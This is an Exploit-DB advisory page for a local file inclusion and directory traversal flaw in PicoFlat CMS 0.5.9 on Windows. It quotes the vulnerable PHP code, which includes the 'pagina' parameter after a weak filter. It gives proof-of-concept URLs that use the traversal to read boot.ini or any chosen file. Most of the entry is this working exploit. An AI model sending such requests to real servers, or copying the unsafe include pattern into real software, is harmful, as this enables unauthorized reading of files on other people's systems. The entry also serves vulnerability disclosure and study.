Lucene search

K
exploitdbGmdaEDB-ID:5690
HistoryMay 29, 2008 - 12:00 a.m.

PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion

2008-05-2900:00:00
gmda
www.exploit-db.com
45

7.4 High

AI Score

Confidence

Low

---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- [email protected] -->


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

# milw0rm.com [2008-05-29]

7.4 High

AI Score

Confidence

Low